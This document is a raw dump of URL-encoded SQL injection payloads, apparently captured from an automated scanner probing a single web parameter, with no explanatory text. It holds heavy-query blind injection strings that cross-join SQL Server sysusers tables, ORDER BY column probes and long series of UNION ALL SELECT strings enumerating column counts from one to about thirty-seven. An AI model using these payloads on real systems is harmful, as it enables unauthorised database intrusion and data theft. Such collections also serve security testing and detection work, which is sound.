-3664%22%29%29%29%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22DubC%22%3D%22DubC -8129%22%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22UHkx%22%3D%22UHkx -8129%22%20OR%206026%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22UHkx%22%3D%22UHkx foo%22%20ORDER%20BY%201%23%20AND%20%22LcvL%22%3D%22LcvL foo%22%20ORDER%20BY%202860%23%20AND%20%22Sdaq%22%3D%22Sdaq foo%22%20UNION%20ALL%20SELECT%20NULL%23%20AND%20%22DiJi%22%3D%22DiJi foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%23%20AND%20%22gIfl%22%3D%22gIfl foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22sdcJ%22%3D%22sdcJ foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22cePv%22%3D%22cePv foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22FCPk%22%3D%22FCPk foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22CgHn%22%3D%22CgHn foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22zXNF%22%3D%22zXNF foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22tyPv%22%3D%22tyPv foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22Vovq%22%3D%22Vovq foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22KEIT%22%3D%22KEIT -1520%22%20ORDER%20BY%201%23%20AND%20%22IvTJ%22%3D%22IvTJ -8516%22%20ORDER%20BY%202407%23%20AND%20%22lYpD%22%3D%22lYpD -6231%22%20UNION%20ALL%20SELECT%209558%23%20AND%20%22bNgJ%22%3D%22bNgJ -6839%22%20UNION%20ALL%20SELECT%203630%2C%203630%23%20AND%20%22oEGF%22%3D%22oEGF -2295%22%20UNION%20ALL%20SELECT%205729%2C%205729%2C%205729%23%20AND%20%22JXRB%22%3D%22JXRB -5711%22%20UNION%20ALL%20SELECT%207326%2C%207326%2C%207326%2C%207326%23%20AND%20%22dVfW%22%3D%22dVfW -7780%22%20UNION%20ALL%20SELECT%205362%2C%205362%2C%205362%2C%205362%2C%205362%23%20AND%20%22NFhN%22%3D%22NFhN -1003%22%20UNION%20ALL%20SELECT%203124%2C%203124%2C%203124%2C%203124%2C%203124%2C%203124%23%20AND%20%22fNlC%22%3D%22fNlC -8191%22%20UNION%20ALL%20SELECT%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%2C%201383%23%20AND%20%22cpmq%22%3D%22cpmq -8853%22%20UNION%20ALL%20SELECT%209259%2C%209259%2C%209259%2C%209259%2C%209259%2C%209259%2C%209259%2C%209259%23%20AND%20%22UIAl%22%3D%22UIAl -7658%22%20UNION%20ALL%20SELECT%203993%2C%203993%2C%203993%2C%203993%2C%203993%2C%203993%2C%203993%2C%203993%2C%203993%23%20AND%20%22Qahn%22%3D%22Qahn -6985%22%20UNION%20ALL%20SELECT%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%2C%201291%23%20AND%20%22LErR%22%3D%22LErR foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22GHDg%22%3D%22GHDg foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22zifG%22%3D%22zifG foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22WogZ%22%3D%22WogZ foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22wOpX%22%3D%22wOpX foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22liyW%22%3D%22liyW foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22qyVY%22%3D%22qyVY foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22rbAN%22%3D%22rbAN foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22uqYW%22%3D%22uqYW foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22JLkv%22%3D%22JLkv foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22lyck%22%3D%22lyck -3258%22%20UNION%20ALL%20SELECT%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%23%20AND%20%22nyzh%22%3D%22nyzh -7807%22%20UNION%20ALL%20SELECT%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%23%20AND%20%22jJze%22%3D%22jJze -1265%22%20UNION%20ALL%20SELECT%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%23%20AND%20%22Lnfw%22%3D%22Lnfw -7614%22%20UNION%20ALL%20SELECT%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%2C%203185%23%20AND%20%22rXIJ%22%3D%22rXIJ -5341%22%20UNION%20ALL%20SELECT%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%23%20AND%20%22nCEL%22%3D%22nCEL -9992%22%20UNION%20ALL%20SELECT%207476%2C%207476%2C%207476%2C%207476%2C%207476%2C%207476%2C%207476%2C%207476%2C%207476%2C%207476%2C%207476%2C%207476%2C%207476%2C%207476%2C%207476%2C%207476%23%20AND%20%22oSSK%22%3D%22oSSK -5827%22%20UNION%20ALL%20SELECT%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%23%20AND%20%22VjSp%22%3D%22VjSp -3541%22%20UNION%20ALL%20SELECT%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%2C%207060%23%20AND%20%22Mhvu%22%3D%22Mhvu -9477%22%20UNION%20ALL%20SELECT%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%2C%209226%23%20AND%20%22hcWt%22%3D%22hcWt -3513%22%20UNION%20ALL%20SELECT%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%23%20AND%20%22yfvS%22%3D%22yfvS foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22zYLX%22%3D%22zYLX foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22qJAl%22%3D%22qJAl foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22wyTb%22%3D%22wyTb foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22gHYR%22%3D%22gHYR foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22RqKS%22%3D%22RqKS foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22bhrO%22%3D%22bhrO foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22zFSr%22%3D%22zFSr foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22vcEO%22%3D%22vcEO foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22OCDy%22%3D%22OCDy foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22Dorr%22%3D%22Dorr -1766%22%20UNION%20ALL%20SELECT%207518%2C%207518%2C%207518%2C%207518%2C%207518%2C%207518%2C%207518%2C%207518%2C%207518%2C%207518%2C%207518%2C%207518%2C%207518%2C%207518%2C%207518%2C%207518%2C%207518%2C%207518%2C%207518%2C%207518%2C%207518%23%20AND%20%22jgeB%22%3D%22jgeB -2336%22%20UNION%20ALL%20SELECT%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%23%20AND%20%22LqOE%22%3D%22LqOE -7417%22%20UNION%20ALL%20SELECT%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%2C%206291%23%20AND%20%22AknS%22%3D%22AknS -8690%22%20UNION%20ALL%20SELECT%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%23%20AND%20%22gBbO%22%3D%22gBbO -8698%22%20UNION%20ALL%20SELECT%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%2C%208560%23%20AND%20%22XqGb%22%3D%22XqGb -9046%22%20UNION%20ALL%20SELECT%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%2C%203968%23%20AND%20%22MpiX%22%3D%22MpiX -8374%22%20UNION%20ALL%20SELECT%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%2C%206140%23%20AND%20%22ThBl%22%3D%22ThBl -1826%22%20UNION%20ALL%20SELECT%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%2C%207306%23%20AND%20%22USJE%22%3D%22USJE -2955%22%20UNION%20ALL%20SELECT%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%2C%209897%23%20AND%20%22Wext%22%3D%22Wext -3791%22%20UNION%20ALL%20SELECT%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%23%20AND%20%22PskJ%22%3D%22PskJ foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22Ljwv%22%3D%22Ljwv foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22wFNf%22%3D%22wFNf foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22sIxl%22%3D%22sIxl foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22rmMc%22%3D%22rmMc foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22zgNp%22%3D%22zgNp foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22gADf%22%3D%22gADf foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22cNdj%22%3D%22cNdj foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22qgRf%22%3D%22qgRf foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22BLTz%22%3D%22BLTz foo%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22sGwy%22%3D%22sGwy -6653%22%20UNION%20ALL%20SELECT%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%2C%209825%23%20AND%20%22QygK%22%3D%22QygK -8530%22%20UNION%20ALL%20SELECT%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%2C%202613%23%20AND%20%22tHht%22%3D%22tHht -5442%22%20UNION%20ALL%20SELECT%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%2C%208098%23%20AND%20%22qeci%22%3D%22qeci -9889%22%20UNION%20ALL%20SELECT%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%23%20AND%20%22euVY%22%3D%22euVY -2438%22%20UNION%20ALL%20SELECT%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%2C%204919%23%20AND%20%22bOqH%22%3D%22bOqH -2117%22%20UNION%20ALL%20SELECT%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%2C%209340%23%20AND%20%22OuGl%22%3D%22OuGl -4990%22%20UNION%20ALL%20SELECT%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%2C%203072%23%20AND%20%22uXrY%22%3D%22uXrY 